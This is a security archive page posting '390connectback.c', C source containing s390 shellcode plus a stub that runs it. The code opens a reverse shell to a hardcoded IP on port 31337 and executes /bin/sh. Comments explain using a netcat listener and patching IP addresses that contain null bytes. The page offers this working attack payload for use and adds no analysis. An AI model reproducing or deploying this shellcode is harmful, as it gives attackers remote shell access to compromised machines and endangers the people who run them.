exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

390connectback.c

390connectback.c
Posted Dec 24, 2002
Site thc.org

s390 shellcode which connects back to a listening netcat on port 31337 by default.

tags | shellcode
SHA-256 | b920ec83e92bca3076d999d7ea4500ee8983d04e6148747a27b9af19517eccf1

390connectback.c

Change Mirror Download
/*----------------------------------------------------------------------*/
/* s390 shellcode 0x0a / 0x0 free */
/* connectback shell, use netcat listener from caller : nc -l -p 31337 */
/* ATTENTION ! altough the code is 0x0a and 0x0 free it may be the case */
/* that u wanna connect an ip like : 10.65.120.22 ( in our example ! ) */
/* our 192.168.0.1 ! in these cases u have 0xa and 0x0 in your address */
/* and u should conside to add some selfmodifing code where u patch the */
/* ip address values on the fly, like i did with the svc calls */
/* code jcyberpunk@thehackerschoice.com */
/*----------------------------------------------------------------------*/
char shellcode[] =
"\x0d\x10" /* basr %r1,%r0 */
"\x41\x90\x10\xa8" /* la %r9,168(%r1) */
"\xa7\x68\x04\x56" /* lhi %r6,1110 */
"\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xa8" /* stc %r6,168(%r1) */
"\xa7\x28\x04\x4e" /* lhi %r2,1102 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x40\x20\xf0\x78" /* sth %r2,120(%r15) */
"\xa7\x38\x7a\x69" /* lhi %r3,31337 */
"\x40\x30\xf0\x7a" /* sth %r3,122(%r15) */
"\x58\x40\x10\xac" /* l %r4,172(%r1) */
"\x50\x40\xf0\x7c" /* st %r4,124(%r15) */
"\x17\x44" /* xr %r4,%r4 */
"\xa7\x38\x04\x4d" /* lhi %r3,1101 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4d" /* lhi %r2,1101 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x72" /* lr %r7,%r2 */
"\x41\x30\xf0\x78" /* la %r3,120(%r15) */
"\xa7\x88\x04\x5c" /* lhi %r8,1116 */
"\x1a\x8a" /* ar %r8,%r10 */
"\x18\x48" /* lr %r4,%r8 */
"\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
"\xa7\x28\x04\x4f" /* lhi %r2,1103 */
"\x1a\x2a" /* ar %r2,%r10 */
"\x41\x30\xf0\x80" /* la %r3,128(%r15) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x18\x27" /* lr %r2,%r7 */
"\xa7\x68\x04\x8b" /* lhi %r6,1163 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xa9" /* stc %r6,169(%r1) */
"\xa7\x38\x04\x4e" /* lhi %r3,1102 */
"\x1a\x3a" /* ar %r3,%r10 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x3a\xff\xff" /* ahi %r3,-1 */
"\x0d\xe9" /* basr %r14,%r9 */
"\xa7\x68\x04\x57" /* lhi %r6,1111 */
"\x1a\x6a" /* ar %r6,%r10 */
"\x42\x60\x10\xa9" /* stc %r6,169(%r1) */
"\x41\x20\x10\xb0" /* la %r2,176(%r1) */
"\x50\x20\x10\xb8" /* st %r2,184(%r1) */
"\x41\x30\x10\xb8" /* la %r3,184(%r1) */
"\x17\x44" /* xr %r4,%r4 */
"\x42\x40\x10\xb7" /* stc %r4,183(%r1) */
"\x50\x40\x10\xbc" /* st %r4,188(%r1) */
"\x41\x40\x10\xbc" /* la %r4,188(%r1) */
"\x0d\xe9" /* basr %r14,%r9 */
"\x0b\x66" /* svc 102 <--- after modification */
"\x07\xfe" /* br %r14 */
"\x0a\x41\x78\x16" /* ip-address to connect back */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x73\x68\x5c"; /* /sh\\ */

main()
{
void (*z)()=(void*)shellcode;
z();
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close